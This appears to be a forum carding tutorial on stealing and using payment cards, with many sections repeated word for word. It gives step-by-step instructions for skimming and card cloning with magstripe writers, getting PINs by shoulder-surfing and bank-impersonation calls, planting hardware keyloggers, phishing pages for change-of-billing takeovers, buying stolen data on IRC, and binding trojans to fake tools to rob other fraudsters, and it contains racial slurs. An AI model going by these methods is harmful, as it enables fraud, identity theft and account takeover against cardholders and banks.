For skimming you'll want a mini portable MSR500M reader that can be fitted on your waistline belt or of course once again under the desk, if you're a cashier. But you'll also want a MSR206 writer if you plan on writing the tracks to an embossed CR-80 piece of plastic later (you can make these yourself but embossers are expensive and it's an expensive procedure, so wait a while until you do that yourself and buy them from IRC (be careful, people like to rip with plastics, or you'll get shit quality if you don't watch out).
If you plan to just sell the dumps on IRC then that's fine, but you'll still need the PIN as well, so if you're a waiter you can get a cheeky peek at them putting their pin into the chip and pin device while you keep hold of it slightly (have them put the pin in while they're sat down and you're standing up). It's much easier to skim in a restaurant rather than clothing retail, as you don't have to think it out and set it up as much. You can keep the MSR500M in your front pocket of the uniform you're wearing and pretend to be giving the card a clean on the sleeve (bullshit and say the device won't read it), while really you're giving it a swipe into your reader. This way the person doesn't even get suspicious because you don't take their card out of sight with them. I guess you could do that technique with clothing retail too when you get their card in your dirty little hands, but peeking for the PIN is harder or you'll have to have a friend shoulder surf for it (or if they're on the next register have them use a sony cyber shot c902 camera phone and pretend to have them talking on the phone while really they're recording the person next to them putting in their PIN; cybershots are really inconspicuous looking with their cameras and VERY clear [5mpixel]).
I'll go into detail what to do with the dumps you have later in the instore carding section.
Using carbonless receipts to get details (pretty outdated method)
If the store you work at hasn't gone carbonless on the transactions information then you can get most of the info from the receipt you get a copy of for yourself and note down the pin on this as well when/if you get it.
Trashing
Trashing for receipts and credit reports (pretty outdated although still works)
Ever heard the expression "Another man's trash is another man's gold"? That's exactly what this is. You'd be surprised how many people haven't heard of a paper shredder or bonfire. They just dump their financial records containing SSN's/NI, full name, address, bank, credit card number, CVV, CVV2 etc. All on forms people couldn't be bothered to dispose of properly because they thought they were JUST old records. Again carders wok on the inside again for when they want to do trashing, a lot of janitors wear rags but you'd be surprised how secretly rich most of them are (along with the other shit they steal from work as well). But also from this if there is not enough info for you on the forms then there is definitely the phone number of the mark on the form that they've scrapped; almost always, and if not then there is enough info on their to look them up in the phone directory. Then of course you use social engineering skills over the phone to get the extra info that you need. If you know of a store that is not carbonless, then go trashing in the bins at the back of the store for the receipts with the credit card details on it.
I'll go into detail what to do with the dumps you have later in the instore carding section.
Using carbonless receipts to get details (pretty outdated method)
If the store you work at hasn't gone carbonless on the transactions information then you can get most of the info from the receipt you get a copy of for yourself and note down the pin on this as well when/if you get it.
Trashing
Trashing for receipts and credit reports (pretty outdated although still works)
Ever heard the expression "Another man's trash is another man's gold"? That's exactly what this is. You'd be surprised how many people haven't heard of a paper shredder or bonfire. They just dump their financial records containing SSN's/NI, full name, address, bank, credit card number, CVV, CVV2 etc. All on forms people couldn't be bothered to dispose of properly because they thought they were JUST old records. Again carders wok on the inside again for when they want to do trashing, a lot of janitors wear rags but you'd be surprised how secretly rich most of them are (along with the other shit they steal from work as well). But also from this if there is not enough info for you on the forms then there is definitely the phone number of the mark on the form that they've scrapped; almost always, and if not then there is enough info on their to look them up in the phone directory. Then of course you use social engineering skills over the phone to get the extra info that you need. If you know of a store that is not carbonless, then go trashing in the bins at the back of the store for the receipts with the credit card details on it.
Phishing over the phone
Phishing over the phone for details
Ever had telemarketers ask for your credit card info over the phone? (this is if you haven't already hung up by just hearing a nigger or paki on the phone) chances are they're a carder. Believe it or not there are people actually stupid enough to fall for these obvious scams. Even more people fall for this if they believe that the caller is from the credit card company itself or part of the secret service or credit fraud investigations; the FBI, CIA and police have nothing at all to do with credit card fraud believe it or not. If you sound professional or part of an important group such as investigations then people are more likely to comply with you if they believe that their card has been used for credit fraud purposes and have to give their credit card info and billing address for verification. The best time to call up the mark is when they are at work as it'll take them by surprise and they'll be wanting to get it sorted asap so that they can get back to work. Also if it's "serious" then the secret service don't wait for you to finish work before they question you. Play along well to the part you're pretending to be. Some social engineering skills are required and you must gain the experience of lying to people yourself. Before calling up the person find out as much information about them as you can.
If you've stolen a CC from someone personally you can call them up pretending to be their bank and tell them there has been some suspicious charges made to the credit card from places such as South Africa, Nigeria, Turkey, Russia; places like that, get them to confirm their details (milk as much as you want out of them, ask them bullshit security questions such as their mother's maiden name, address, etc; you may as well, it'll make it easier to get a COB for you to use).
You can also get their PIN out of them if you want as well by either straight out asking them to confirm it, or be crafty and after you've told them to verify their PIN you're putting them through to a different department; then play some cheesy music down the phone for a few mins, have a female voice recording (use AV vocie changer) asking them to input their PIN on their dialpad (this won't be as suspicious); get these recorded so they can be decoded with DTMF decoding hardware/software later (although it's expensive). Guessing DTMF tones is pretty easy too, but you need to know what each tone sounds like, it's preferred to use decoding software to ensure you have it correct.
If you try hard enough you can get full info about anyone over the phone (I suggest using spoofcard for this).
Keylogging for CVV2s
Hardware keylogging
First of all it's best if you use hardware keyloggers here that you put into the keyboard of a computer belonging to an area where a lot of people are going online a lot and logging into e-mails, ebays, paypals etc, pretty much giving you enough info for you to go searching through if you get in their e-mails, or maybe you're lucky enough to get someone who is buying something online anyway. Get the keyloggers from here:
Code:
http://tyner.com/datalogger/keykatcher.htm
And come back within 2 days time or so and collect the keylogger after doing some browsing yourself (as to not look suspicious just coming in and then leaving a few seconds later).
Or of course you could set one up in a business and do the classic call in and do some social engineering from the credit card company or secret service and have them go to the bank online and have them log in to verify, or maybe even have them log in to a fake bank online made by yourself that will collect anyone's info who logs in on it.
Carding Instore
Instore carding is the act of skimming a credit card and writing the dumps and track1+2 to a CR-80 piece of plastic and then either cashing out at the ATM or shopping for goods instore, as long as you have the PIN as well through whatever method you choose to use.
Phishing over the phone for details
Ever had telemarketers ask for your credit card info over the phone? (this is if you haven't already hung up by just hearing a nigger or paki on the phone) chances are they're a carder. Believe it or not there are people actually stupid enough to fall for these obvious scams. Even more people fall for this if they believe that the caller is from the credit card company itself or part of the secret service or credit fraud investigations; the FBI, CIA and police have nothing at all to do with credit card fraud believe it or not. If you sound professional or part of an important group such as investigations then people are more likely to comply with you if they believe that their card has been used for credit fraud purposes and have to give their credit card info and billing address for verification. The best time to call up the mark is when they are at work as it'll take them by surprise and they'll be wanting to get it sorted asap so that they can get back to work. Also if it's "serious" then the secret service don't wait for you to finish work before they question you. Play along well to the part you're pretending to be. Some social engineering skills are required and you must gain the experience of lying to people yourself. Before calling up the person find out as much information about them as you can.
If you've stolen a CC from someone personally you can call them up pretending to be their bank and tell them there has been some suspicious charges made to the credit card from places such as South Africa, Nigeria, Turkey, Russia; places like that, get them to confirm their details (milk as much as you want out of them, ask them bullshit security questions such as their mother's maiden name, address, etc; you may as well, it'll make it easier to get a COB for you to use).
You can also get their PIN out of them if you want as well by either straight out asking them to confirm it, or be crafty and after you've told them to verify their PIN you're putting them through to a different department; then play some cheesy music down the phone for a few mins, have a female voice recording (use AV vocie changer) asking them to input their PIN on their dialpad (this won't be as suspicious); get these recorded so they can be decoded with DTMF decoding hardware/software later (although it's expensive). Guessing DTMF tones is pretty easy too, but you need to know what each tone sounds like, it's preferred to use decoding software to ensure you have it correct.
If you try hard enough you can get full info about anyone over the phone (I suggest using spoofcard for this).
Keylogging for CVV2s
Hardware keylogging
First of all it's best if you use hardware keyloggers here that you put into the keyboard of a computer belonging to an area where a lot of people are going online a lot and logging into e-mails, ebays, paypals etc, pretty much giving you enough info for you to go searching through if you get in their e-mails, or maybe you're lucky enough to get someone who is buying something online anyway. Get the keyloggers from here:
Code:
http://tyner.com/datalogger/keykatcher.htm
And come back within 2 days time or so and collect the keylogger after doing some browsing yourself (as to not look suspicious just coming in and then leaving a few seconds later).
Or of course you could set one up in a business and do the classic call in and do some social engineering from the credit card company or secret service and have them go to the bank online and have them log in to verify, or maybe even have them log in to a fake bank online made by yourself that will collect anyone's info who logs in on it.
Carding Instore
Instore carding is the act of skimming a credit card and writing the dumps and track1+2 to a CR-80 piece of plastic and then either cashing out at the ATM or shopping for goods instore, as long as you have the PIN as well through whatever method you choose to use.
How it's done is through the use of thejerm software or any other magstripe utility software (thejerm is the best to use). And you do it like this:
Written by: Acetrace
1. Load up thejerms software
2. hit settings tab
3. hit "Defaults" in Leading Zeros box
4. hit "75 bpi" in Set Track 2 density box
5. go bak to actions
6. hit LoCo or HiCo in Coercivity box, depending on which you want to do
7. input your tracks 1 & 2 (without the % ; or ? symbols because the program already does it for you)
8. hit Write Card and swipe your card. (i usually do a read card afterwards to make sure everything went ok)
9. GO SHOPPING!!!
Download thejerm from here:
Code:
PM ME FOR DOWNLOAD LINKS (OMNISCIENT)
I was a member of this site and it came from there so don't worry about it not being safe, I used this software a lot back in the day.
Now how you should act when you go carding instore is pretty much common sense, but some people get caught up in the moment with nerves, cockiness or just too much weird amounts of excitement.
Simple what you do, make sure you KNOW the PIN for the card you're using before you go, don't be stuck at the counter trying to remember it. If you're going to be carding expensive goods then dress smart for the occasion, wear brand named clothing (that you've previously carded Razz) or even a suit. It would look suspicious someone with a hoodie going into a store and buying a Louis Vuitton watch, so walk in with style. When you go instore, you ACT like you are using your own card, because essentially that's what it is (well it is now anyway lol) no looking shifty and don't look at the fucking cameras; the cameras mean nothing anyway, they don't know your name or where you live, they're not being watched half of the time, so stop worrying about the fucking cameras; remember you're doing nothing wrong. When you go in, don't rush take your time, browse around some other items. Find the item you want to card and even ask the employee simple questions about it (if it's a TV or comp just ask questions about certain specs and if it's good for playing video games on). You'll be most nervous at the checkout, just act as normal as you always have been, don't make too much small talk but be polite and civil. Once you have the good sin your hands don't bolt out the door, just say thank you and then casually walk out the door, get to your car and then celebrate all you want.
Carding over the phone
Okay 1st of all do not be a dumb fuck now, do not call from your own phones at all. For extra lulz you could use a beige box and call from someone else's phone but that's a totally different game all together and is also a major felony to go agains tyou on the chance that you do get caught so we'll keep it simple and use a payphone (it's not AS risky to phreak these but the only recent red box tones I have are from the year 2007 and I'm pretty sure they'd have changed the system again...bastards, I'll check sometime though . The next day postage is said so that they have less time to look up details on the order. Some cards will have difficulty shipping to any address other than the billing address, but it doesn't hurt to try. If they start to question you then just answer the questions and talk your way around the situation with your social engineering skills; don't just run away from the questions or hang up straight away, otherwise that is cause for suspicion and they may investigate. If all goes well you should have your item of choice delivered to your drop location or a house of someone else's address who you don't know and call them up saying that you called up the store and they've sent the package to the wrong address and it is still sending there, and ask them if they could kindly keep and sign for the package and you'll pick it up after work (this is a last resort and only to be tried if you're good at talking to people, which you should be if you're a carder). I recommend checking out the section on drops later on in this text.
Written by: Acetrace
1. Load up thejerms software
2. hit settings tab
3. hit "Defaults" in Leading Zeros box
4. hit "75 bpi" in Set Track 2 density box
5. go bak to actions
6. hit LoCo or HiCo in Coercivity box, depending on which you want to do
7. input your tracks 1 & 2 (without the % ; or ? symbols because the program already does it for you)
8. hit Write Card and swipe your card. (i usually do a read card afterwards to make sure everything went ok)
9. GO SHOPPING!!!
Download thejerm from here:
Code:
PM ME FOR DOWNLOAD LINKS (OMNISCIENT)
I was a member of this site and it came from there so don't worry about it not being safe, I used this software a lot back in the day.
Now how you should act when you go carding instore is pretty much common sense, but some people get caught up in the moment with nerves, cockiness or just too much weird amounts of excitement.
Simple what you do, make sure you KNOW the PIN for the card you're using before you go, don't be stuck at the counter trying to remember it. If you're going to be carding expensive goods then dress smart for the occasion, wear brand named clothing (that you've previously carded Razz) or even a suit. It would look suspicious someone with a hoodie going into a store and buying a Louis Vuitton watch, so walk in with style. When you go instore, you ACT like you are using your own card, because essentially that's what it is (well it is now anyway lol) no looking shifty and don't look at the fucking cameras; the cameras mean nothing anyway, they don't know your name or where you live, they're not being watched half of the time, so stop worrying about the fucking cameras; remember you're doing nothing wrong. When you go in, don't rush take your time, browse around some other items. Find the item you want to card and even ask the employee simple questions about it (if it's a TV or comp just ask questions about certain specs and if it's good for playing video games on). You'll be most nervous at the checkout, just act as normal as you always have been, don't make too much small talk but be polite and civil. Once you have the good sin your hands don't bolt out the door, just say thank you and then casually walk out the door, get to your car and then celebrate all you want.
Carding over the phone
Okay 1st of all do not be a dumb fuck now, do not call from your own phones at all. For extra lulz you could use a beige box and call from someone else's phone but that's a totally different game all together and is also a major felony to go agains tyou on the chance that you do get caught so we'll keep it simple and use a payphone (it's not AS risky to phreak these but the only recent red box tones I have are from the year 2007 and I'm pretty sure they'd have changed the system again...bastards, I'll check sometime though . The next day postage is said so that they have less time to look up details on the order. Some cards will have difficulty shipping to any address other than the billing address, but it doesn't hurt to try. If they start to question you then just answer the questions and talk your way around the situation with your social engineering skills; don't just run away from the questions or hang up straight away, otherwise that is cause for suspicion and they may investigate. If all goes well you should have your item of choice delivered to your drop location or a house of someone else's address who you don't know and call them up saying that you called up the store and they've sent the package to the wrong address and it is still sending there, and ask them if they could kindly keep and sign for the package and you'll pick it up after work (this is a last resort and only to be tried if you're good at talking to people, which you should be if you're a carder). I recommend checking out the section on drops later on in this text.
I recommend using spoofcard for verification over the payphone, if they need to verify (if they won't send without some verification which is usually the case).
IRC
Services provided in IRC
IRC is the main gathering for fellow carders, scam artists and rippers. To put it in a nut shell, IRC is THE black market, unlike craigslist and eBay which are just black markets. You can get anything illegal off IRC from CP to warez to CC details (which is what we want).
To concentrate on carding though you can buy:
CVVs
CVV2s
SSNs
Utility bill scans
CC scans
COB (a service to get someone to call up the victim's bank and get the billing address changed to your drop)
Payment for using someone else's drop and then sending to you
Spyware
Fake ID/ ID scans
DUMPZ
Phisher pages
The list really is endless
There are a lot of advantages to using IRC networks and channels which I'll go into now:
- The channels are often underground and not known to many people, so they're harder to stumble upon by some random guy.
- The messages can be encrypted so they can't be read by anyone happening to be on the network sniffing the traffic. This makes it harder for investigators to uncover.
- Easier and quicker to communicate with mass amounts of like minded people.
- Variety of channels to go to if one doesn't suit you (there are MILLIONS and new ones being made every second, guaranteed).
- And of course a varity of services, if you need something you can bet someone from the other side of the world will be willing to share or/and sell to you.
There are a lot of disadvantages though, IRC is the equivalent of a backstreet alley, you'll be fine if you stay cautious, here's what you should be weary of:
- Viruses
- If you don't have strong anti viruses and firewalls you will get infected (no norton shit, kaspersky and NOD32 are what you want)
- Do not accept random .exes or any file for that matter
- It is easy to get ripped off, choose your forms of payments and who you deal with wisely
How to find carding channels (Will not go too much into this as there are secrets between fellow carders which we like people interested enough to find out for themselves)
Here is the most commonly asked question I get asked by n00bies and fellow carders; where do you find these channels?
If I'm being totally honest the best place to find out about them is through Nigerians; no bullshit that is where I found out about a lot of the carder channels I used, also how I found out about forums and their IRCs too such as cardersplanet, darkmarket etc. How I found him out was just on a normal scam bait I was doing, it wasn't a long one, but in the end he tried phishing me so I tried back and we had a laugh about it; I was straight up with him and told him I wanted to get deeper into the game, I looked up to his type of people and wanted to get rich/successful (I also shared the double claim secret about paypal with him which got him trusting me a little bit) he then sent me an invite to cardersplanet (this site was full of Nigerians). Eventually I went in the IRC (admittedly got ripped a few times) then started vending myself under various diff nicknames, then moved onto different sites like darkmarket and cardingzone when I'd got invites for them (although cardingzone is shit it's good to get in the IRC for starting off, you'll get invited to better forums the more you hang out in IRC, trust me). Don't ask me for invites to cardingzone, I was banned for ripping (I didn't rip anyone :angry
The quicker way is to use these and search for certain keywords:
Code:
http://www.irclinux.org
http://www.irctrace.com
http://www.irclog.org
http://www.rcarchive.info
http://www.irc-chat-logs.com
http://www.irseek.com/
And of course don't forget google.
I'm only going to give you one clue for searching through google for a carding IRC, and that word is "undernet".
Fellow carders don't like revealing their IRCs, and for obvious reasons.
My advice is find a scammer through e-mail, and chat to him; be witty with it but be respectful to a fellow fraudster.
IRC
Services provided in IRC
IRC is the main gathering for fellow carders, scam artists and rippers. To put it in a nut shell, IRC is THE black market, unlike craigslist and eBay which are just black markets. You can get anything illegal off IRC from CP to warez to CC details (which is what we want).
To concentrate on carding though you can buy:
CVVs
CVV2s
SSNs
Utility bill scans
CC scans
COB (a service to get someone to call up the victim's bank and get the billing address changed to your drop)
Payment for using someone else's drop and then sending to you
Spyware
Fake ID/ ID scans
DUMPZ
Phisher pages
The list really is endless
There are a lot of advantages to using IRC networks and channels which I'll go into now:
- The channels are often underground and not known to many people, so they're harder to stumble upon by some random guy.
- The messages can be encrypted so they can't be read by anyone happening to be on the network sniffing the traffic. This makes it harder for investigators to uncover.
- Easier and quicker to communicate with mass amounts of like minded people.
- Variety of channels to go to if one doesn't suit you (there are MILLIONS and new ones being made every second, guaranteed).
- And of course a varity of services, if you need something you can bet someone from the other side of the world will be willing to share or/and sell to you.
There are a lot of disadvantages though, IRC is the equivalent of a backstreet alley, you'll be fine if you stay cautious, here's what you should be weary of:
- Viruses
- If you don't have strong anti viruses and firewalls you will get infected (no norton shit, kaspersky and NOD32 are what you want)
- Do not accept random .exes or any file for that matter
- It is easy to get ripped off, choose your forms of payments and who you deal with wisely
How to find carding channels (Will not go too much into this as there are secrets between fellow carders which we like people interested enough to find out for themselves)
Here is the most commonly asked question I get asked by n00bies and fellow carders; where do you find these channels?
If I'm being totally honest the best place to find out about them is through Nigerians; no bullshit that is where I found out about a lot of the carder channels I used, also how I found out about forums and their IRCs too such as cardersplanet, darkmarket etc. How I found him out was just on a normal scam bait I was doing, it wasn't a long one, but in the end he tried phishing me so I tried back and we had a laugh about it; I was straight up with him and told him I wanted to get deeper into the game, I looked up to his type of people and wanted to get rich/successful (I also shared the double claim secret about paypal with him which got him trusting me a little bit) he then sent me an invite to cardersplanet (this site was full of Nigerians). Eventually I went in the IRC (admittedly got ripped a few times) then started vending myself under various diff nicknames, then moved onto different sites like darkmarket and cardingzone when I'd got invites for them (although cardingzone is shit it's good to get in the IRC for starting off, you'll get invited to better forums the more you hang out in IRC, trust me). Don't ask me for invites to cardingzone, I was banned for ripping (I didn't rip anyone :angry
The quicker way is to use these and search for certain keywords:
Code:
http://www.irclinux.org
http://www.irctrace.com
http://www.irclog.org
http://www.rcarchive.info
http://www.irc-chat-logs.com
http://www.irseek.com/
And of course don't forget google.
I'm only going to give you one clue for searching through google for a carding IRC, and that word is "undernet".
Fellow carders don't like revealing their IRCs, and for obvious reasons.
My advice is find a scammer through e-mail, and chat to him; be witty with it but be respectful to a fellow fraudster.
Vendors and how to approach them
Vendors are the people in IRC who are selling and providing the services for you. There are certain ways you should speak to vendors otherwise they're going to rip you (remember this is the black market, this is just like going up to a random drug dealer in the street and not knowing what you really want or what you're getting into; you'll get ripped off). Ask as many questions as possible of what you want to know, if you're buying a CVV2 ask to see proof of their details working (get them to make a small purchase somewhere; they should show you a before and after and the limits that are there on the card [there are methods out there of checking your balance; you can even get it through text/sms]. This is a market so remember there are more people that will be willing to buy from that vendor, it's open for all, you can get a full load of info including dumps for as low as ?3/$5, drops usually go for ?7; if someone is saying higher prices don't be afraid to haggle down to these prices or a little bit lower. COBs go for a little bit higher in ranges of ?15-?20 because the vendor needs to get full info on someone and then change the billing address through the bank to where ever your drop is.
Now when you go in the channel don't fucking say or request anything, shut up and see what the vendors are saying they have to offer and then send them a private message and talk to them. If any "vendor" messages you 1st trying to push onto you to buy from them then they're most likely a ripper; however don't piss off the rippers or assume someone is a ripper because you never know who is going to be there to help you out later on down the line or who might be pissed off enough to fuck you over.
I can't give any big advice on not getting ripped in IRC because you don't personally know anyone in there at all, you just have to take your chances (expect to get ripped your 1st few times going in there, just don't go to them again, because if they get away with it once they'll definitely try again if you go back to them).
DO NOT BUY ANY WU BUG(Western Union Bug); it is a massive ripper technique which is bullshit. The WU BUG used to work but was patched a looong time ago, most of the time now you'll get nothing or you'll end up with a rootkit on your comp. Rippers always say ridiculous prices for these too such as $200+; but if someone says lower prices it's still bullshit and most likely a rootkit/trojan/keylogger going to be installed on your machine while you get some useless program that does nothing.
Ripping
Easy as hell to do, not much photoshop skills needed really either.
Bullshit and say you're selling full info (you're getting the info from fakenamegenerator.com or any credit card gen program; of course they don't fucking work), if they want to see proof just use your own legit CC or another stolen CC to buy something and show them proof of you buying it, except photoshop the details to that which you're going to be giving him later. Take payment through Western Union ONLY (since e-gold isn't around anymore), then just send him the bullshit info.
If they want the report to go to their phone via SMS then just spoof a text with an sms bomber saying some bullshit reports. Then get the payment via WU.
To get victims you message them 1st, message out in the whole channel 1st and then PM random buyers (look for ones requesting).
::::WU BUG::::
seriously this is bullshit, all people are doing are showing buyers fake screenshots made in PS or are actually making quick programs themselves and taking screens of them and then selling them, although essentially they're useless. You want to do this, but you want to actually send them a file as well, but bind a keylogger or trojan to it; not only can you rip them out of their cash to buy your infection but the info you get from spying on them will be so much more as well ranging from their info to other stolen CC info, you'll have a backdoor on what they do and can exploit it.
Vendors are the people in IRC who are selling and providing the services for you. There are certain ways you should speak to vendors otherwise they're going to rip you (remember this is the black market, this is just like going up to a random drug dealer in the street and not knowing what you really want or what you're getting into; you'll get ripped off). Ask as many questions as possible of what you want to know, if you're buying a CVV2 ask to see proof of their details working (get them to make a small purchase somewhere; they should show you a before and after and the limits that are there on the card [there are methods out there of checking your balance; you can even get it through text/sms]. This is a market so remember there are more people that will be willing to buy from that vendor, it's open for all, you can get a full load of info including dumps for as low as ?3/$5, drops usually go for ?7; if someone is saying higher prices don't be afraid to haggle down to these prices or a little bit lower. COBs go for a little bit higher in ranges of ?15-?20 because the vendor needs to get full info on someone and then change the billing address through the bank to where ever your drop is.
Now when you go in the channel don't fucking say or request anything, shut up and see what the vendors are saying they have to offer and then send them a private message and talk to them. If any "vendor" messages you 1st trying to push onto you to buy from them then they're most likely a ripper; however don't piss off the rippers or assume someone is a ripper because you never know who is going to be there to help you out later on down the line or who might be pissed off enough to fuck you over.
I can't give any big advice on not getting ripped in IRC because you don't personally know anyone in there at all, you just have to take your chances (expect to get ripped your 1st few times going in there, just don't go to them again, because if they get away with it once they'll definitely try again if you go back to them).
DO NOT BUY ANY WU BUG(Western Union Bug); it is a massive ripper technique which is bullshit. The WU BUG used to work but was patched a looong time ago, most of the time now you'll get nothing or you'll end up with a rootkit on your comp. Rippers always say ridiculous prices for these too such as $200+; but if someone says lower prices it's still bullshit and most likely a rootkit/trojan/keylogger going to be installed on your machine while you get some useless program that does nothing.
Ripping
Easy as hell to do, not much photoshop skills needed really either.
Bullshit and say you're selling full info (you're getting the info from fakenamegenerator.com or any credit card gen program; of course they don't fucking work), if they want to see proof just use your own legit CC or another stolen CC to buy something and show them proof of you buying it, except photoshop the details to that which you're going to be giving him later. Take payment through Western Union ONLY (since e-gold isn't around anymore), then just send him the bullshit info.
If they want the report to go to their phone via SMS then just spoof a text with an sms bomber saying some bullshit reports. Then get the payment via WU.
To get victims you message them 1st, message out in the whole channel 1st and then PM random buyers (look for ones requesting).
::::WU BUG::::
seriously this is bullshit, all people are doing are showing buyers fake screenshots made in PS or are actually making quick programs themselves and taking screens of them and then selling them, although essentially they're useless. You want to do this, but you want to actually send them a file as well, but bind a keylogger or trojan to it; not only can you rip them out of their cash to buy your infection but the info you get from spying on them will be so much more as well ranging from their info to other stolen CC info, you'll have a backdoor on what they do and can exploit it.
If you can't be bothered making fake screenshots then get them from other rippers trying to sell them, get them to show you pics, vids and info; then use it for yourself and rip some n00bs.
Phishing for Change of billing
A billing address is the details used for a person's bank account and most often their credit cards and everything else too, this includes their phone number too.
What a change of billing (COB) is in a nutshell is changing the billing address registered to the card to your drop address you're gonna be using. When you want to card BIG at various online websites the orders will look more legit that you're not sending it else where other than the one registered to the card (obviously after you've changed the billing address), meaning the delivery of your goods will be quicker and will require a lot less verification.
Most of the time you change the billing address over the phone but SOME banks will let you do it online; when you phone up to change it you use spoofcard.com or the pay as you go mobile phone you're going to be using when carding, or beige boxing Razz
When changing the billing address you need to know as much info as possible about the person's billing address you're changing, because the bank is going to ask you 3 security questions you set (such as mother's maiden name) before they change it.
You can phish for details over the phone (see the phishin over the phone section above), however it's best to use keyloggers and phisher pages for this with a MIX of over the phone.
Use through phishing pages
2 methods here, 1 including over the phone, one isn't.
The method without the phone is to just send a ton of e-mails out to random people and send them a html e-mail telling them they need to update their information before the account is suspended or their account with the bank will be cancelled, you have them go to a phisher page off the template and the phisher pages "requires" them to answer security questions like their mother's maiden name, their pet's name, you know those type of questions.
Another method is to call them up pretending to be the bank and saying there have been different ip ranges logging on their account and they need to confirm their details online, link them to the phisher page and have them fill in the details; have the phisher page redirect to the actual online bank's login page; then ask if they've done that over the phone, tell them to wait a minute while you confirm and check it all out, say it's all clear and tell them to log in, they'll think nothing of it and you now have the answers to their secret questions which you can give to the bank itself when you go to change the billing address.
Use through keylogging
This is my favourite method and what I told S_E last night in IRC.
You have a hardware (or software) keylogger set on someone's comp, use sock proxies when logging into their online bank account and then change their password, call them up pretending to be the bank and then get them to go to the actual online bank link and fill in their forgotten password options (answering secret questions) or of course get them to go to your phisher page and fill in the details (this is if you want to add more fields to get more info) then pretend to be checking it all over, then change their password again to some random letters and numbers and give it to them to log back in (it doesn't matter because they're keylogged and you'll get their new login if they change the password again anyway), you'll have all their info logged down too for you to answer your questions when you call the bank.
Best time to do all of this is around the 10th day of the month (people usually get their credit reports at the start of every month), this will give you plenty of time to card enough for the remaining days until they see they're not getting their reports coming to them anymore (if you're crafty you can pretend to have cancelled the online bank account for them after they've gave you the info you need to know; I used to do this method and keep it going without them knowing).
Phishing for Change of billing
A billing address is the details used for a person's bank account and most often their credit cards and everything else too, this includes their phone number too.
What a change of billing (COB) is in a nutshell is changing the billing address registered to the card to your drop address you're gonna be using. When you want to card BIG at various online websites the orders will look more legit that you're not sending it else where other than the one registered to the card (obviously after you've changed the billing address), meaning the delivery of your goods will be quicker and will require a lot less verification.
Most of the time you change the billing address over the phone but SOME banks will let you do it online; when you phone up to change it you use spoofcard.com or the pay as you go mobile phone you're going to be using when carding, or beige boxing Razz
When changing the billing address you need to know as much info as possible about the person's billing address you're changing, because the bank is going to ask you 3 security questions you set (such as mother's maiden name) before they change it.
You can phish for details over the phone (see the phishin over the phone section above), however it's best to use keyloggers and phisher pages for this with a MIX of over the phone.
Use through phishing pages
2 methods here, 1 including over the phone, one isn't.
The method without the phone is to just send a ton of e-mails out to random people and send them a html e-mail telling them they need to update their information before the account is suspended or their account with the bank will be cancelled, you have them go to a phisher page off the template and the phisher pages "requires" them to answer security questions like their mother's maiden name, their pet's name, you know those type of questions.
Another method is to call them up pretending to be the bank and saying there have been different ip ranges logging on their account and they need to confirm their details online, link them to the phisher page and have them fill in the details; have the phisher page redirect to the actual online bank's login page; then ask if they've done that over the phone, tell them to wait a minute while you confirm and check it all out, say it's all clear and tell them to log in, they'll think nothing of it and you now have the answers to their secret questions which you can give to the bank itself when you go to change the billing address.
Use through keylogging
This is my favourite method and what I told S_E last night in IRC.
You have a hardware (or software) keylogger set on someone's comp, use sock proxies when logging into their online bank account and then change their password, call them up pretending to be the bank and then get them to go to the actual online bank link and fill in their forgotten password options (answering secret questions) or of course get them to go to your phisher page and fill in the details (this is if you want to add more fields to get more info) then pretend to be checking it all over, then change their password again to some random letters and numbers and give it to them to log back in (it doesn't matter because they're keylogged and you'll get their new login if they change the password again anyway), you'll have all their info logged down too for you to answer your questions when you call the bank.
Best time to do all of this is around the 10th day of the month (people usually get their credit reports at the start of every month), this will give you plenty of time to card enough for the remaining days until they see they're not getting their reports coming to them anymore (if you're crafty you can pretend to have cancelled the online bank account for them after they've gave you the info you need to know; I used to do this method and keep it going without them knowing).